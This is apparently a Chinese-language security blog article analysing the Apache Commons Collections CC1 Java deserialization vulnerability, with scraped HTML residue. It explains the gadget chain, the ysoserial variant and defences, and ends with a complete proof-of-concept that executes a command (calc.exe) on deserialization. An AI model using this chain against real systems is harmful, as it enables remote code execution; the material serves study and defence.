Apache Commons Collections反序列化漏洞(CC1)深入分析与利用<\/h1>

一、漏洞背景<\/h2>
Apache Commons Collections是一个广泛使用的Java集合框架扩展库，提供了许多强大的数据结构类型和集合工具类。该库中的`InvokerTransformer<\/code>类可以通过Java反射机制调用任意函数，导致了严重的反序列化漏洞。<\/p>`

漏洞影响<\/h3>

影响版本：commons-collections 3.1及以下<\/li>
Java版本限制：8u71之前（特别是8u66已验证可用）<\/li>
<\/ul>
二、核心漏洞原理<\/h2>
关键类分析<\/h3>


InvokerTransformer<\/strong><\/p>

实现了Transformer<\/code>接口<\/li>
通过反射调用任意方法<\/li>
<\/ul>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    Method method =<\/span> input.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>    return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

ChainedTransformer<\/strong><\/p>

将多个Transformer<\/code>串联执行<\/li>
<\/ul>
public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span>
<\/span><\/span>    for<\/span> (<\/span>Transformer transformer :<\/span> iTransformers)<\/span> {<\/span>
<\/span><\/span>        object =<\/span> transformer.<\/span>transform<\/span>(<\/span>object);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> object;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

TransformedMap<\/strong><\/p>

对Map进行装饰，在插入\/修改元素时执行转换<\/li>
<\/ul>
public<\/span> Object put<\/span>(<\/span>Object key,<\/span> Object value)<\/span> {<\/span>
<\/span><\/span>    key =<\/span> transformKey(<\/span>key);<\/span>
<\/span><\/span>    value =<\/span> transformValue(<\/span>value);<\/span>
<\/span><\/span>    return<\/span> getMap().<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞触发流程<\/h3>

构造恶意Transformer<\/code>链，通过反射执行命令<\/li>
使用TransformedMap<\/code>装饰普通Map<\/li>
通过AnnotationInvocationHandler<\/code>的readObject<\/code>触发转换<\/li>
<\/ol>
三、漏洞利用分析<\/h2>
基础POC构造<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> String[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>完整利用链<\/h3>


序列化过程<\/strong>：<\/p>

创建ChainedTransformer<\/code>包含恶意转换链<\/li>
使用TransformedMap.decorate<\/code>装饰Map<\/li>
通过反射创建AnnotationInvocationHandler<\/code>实例<\/li>
序列化该实例<\/li>
<\/ul>
<\/li>

反序列化过程<\/strong>：<\/p>

AnnotationInvocationHandler.readObject<\/code>被调用<\/li>
遍历memberValues<\/code>条目<\/li>
调用setValue<\/code>触发TransformedMap<\/code>的转换<\/li>
执行预设的命令<\/li>
<\/ul>
<\/li>
<\/ol>
关键点说明<\/h3>


为什么使用AnnotationInvocationHandler<\/code><\/strong>：<\/p>

其readObject<\/code>方法会遍历Map并调用setValue<\/code><\/li>
是Java反序列化漏洞的常见入口点<\/li>
<\/ul>
<\/li>

为什么键必须是"value"<\/strong>：<\/p>

AnnotationInvocationHandler<\/code>构造函数参数必须是Annotation子类<\/li>
该类必须含有至少一个方法(如Retention<\/code>的value<\/code>)<\/li>
Map中必须有一个键名为该方法的元素<\/li>
<\/ul>
<\/li>

Runtime的序列化问题<\/strong>：<\/p>

Runtime<\/code>不可序列化，需通过反射获取实例<\/li>
使用Runtime.class<\/code>作为起点，通过反射链获取Runtime.getRuntime()<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
四、高级利用技巧<\/h2>
ysoserial的利用方式<\/h3>
ysoserial采用了更复杂的利用链，使用LazyMap<\/code>和动态代理：<\/p>
Map outerMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformerChain);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建动态代理
<\/span><\/span><\/span><\/span>InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> construct.<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> outerMap);<\/span>
<\/span><\/span>Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    Map.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    handler);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 再次包装
<\/span><\/span><\/span><\/span>handler =<\/span> (<\/span>InvocationHandler)<\/span> construct.<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> proxyMap);<\/span>
<\/span><\/span><\/code><\/pre>优势<\/strong>：<\/p>

通过动态代理，任何Map方法调用都会触发InvocationHandler.invoke<\/code><\/li>
在invoke<\/code>中调用get<\/code>方法触发LazyMap<\/code>的转换<\/li>
<\/ol>
8u71之后的失效原因<\/h3>
Java 8u71修改了AnnotationInvocationHandler.readObject<\/code>：<\/p>

不再直接使用反序列化的Map对象<\/li>
新建LinkedHashMap<\/code>并复制值<\/li>
删除了memberValue.setValue<\/code>调用<\/li>
<\/ol>
五、防御措施<\/h2>


升级Commons Collections<\/strong>：<\/p>

使用3.2.2或更高版本<\/li>
新版本中InvokerTransformer<\/code>等类不再实现Serializable<\/code><\/li>
<\/ul>
<\/li>

Java安全配置<\/strong>：<\/p>

升级Java到最新版本<\/li>
使用安全管理器限制反序列化<\/li>
<\/ul>
<\/li>

代码层面<\/strong>：<\/p>

避免反序列化不可信数据<\/li>
使用白名单验证反序列化的类<\/li>
<\/ul>
<\/li>
<\/ol>
六、实验环境搭建<\/h2>
所需组件<\/h3>

JDK 8u66<\/li>
commons-collections 3.1<\/li>
IDE调试环境配置<\/li>
<\/ol>
关键配置<\/h3>

添加sun包源码到IDE<\/li>
设置正确的编译版本<\/li>
使用调试模式观察调用链<\/li>
<\/ol>
七、扩展思考<\/h2>


其他利用链<\/strong>：<\/p>

CC链有多个变种(CC2, CC3等)<\/li>
使用不同入口点和转换链<\/li>
<\/ul>
<\/li>

现代环境中的利用<\/strong>：<\/p>

在受限环境下的利用技巧<\/li>
与其他漏洞的结合利用<\/li>
<\/ul>
<\/li>

漏洞挖掘方法论<\/strong>：<\/p>

如何分析Java反序列化漏洞<\/li>
常见危险类的特征<\/li>
<\/ul>
<\/li>
<\/ol>
附录：完整POC代码<\/h2>
public<\/span> class<\/span> CommonCollections1<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]<\/span> {<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]<\/span> {<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]<\/span> {<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> String[]<\/span> {<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        
<\/span><\/span>        Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        innerMap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "xxxx"<\/span>);<\/span>
<\/span><\/span>        Map outerMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor construct =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        construct.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object obj =<\/span> construct.<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> outerMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream barr =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>barr);<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 反序列化触发
<\/span><\/span><\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>barr.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>        Object o =<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>参考资料<\/h2>

phith0n Java安全漫谈系列<\/a><\/li>
Apache Commons Collections官方文档<\/a><\/li>
Oracle Java安全指南<\/a><\/li>
<\/ol>
Apache Commons Collections反序列化漏洞(CC1)深入分析与利用<\/h1>

二、核心漏洞原理<\/h2>

三、漏洞利用分析<\/h2>

四、高级利用技巧<\/h2>

六、实验环境搭建<\/h2>

参考资料<\/h2> phith0n Java安全漫谈系列<\/a><\/li> Apache Commons Collections官方文档<\/a><\/li> Oracle Java安全指南<\/a><\/li> <\/ol>

参考资料<\/h2>

phith0n Java安全漫谈系列<\/a><\/li>
Apache Commons Collections官方文档<\/a><\/li>
Oracle Java安全指南<\/a><\/li> <\/ol>
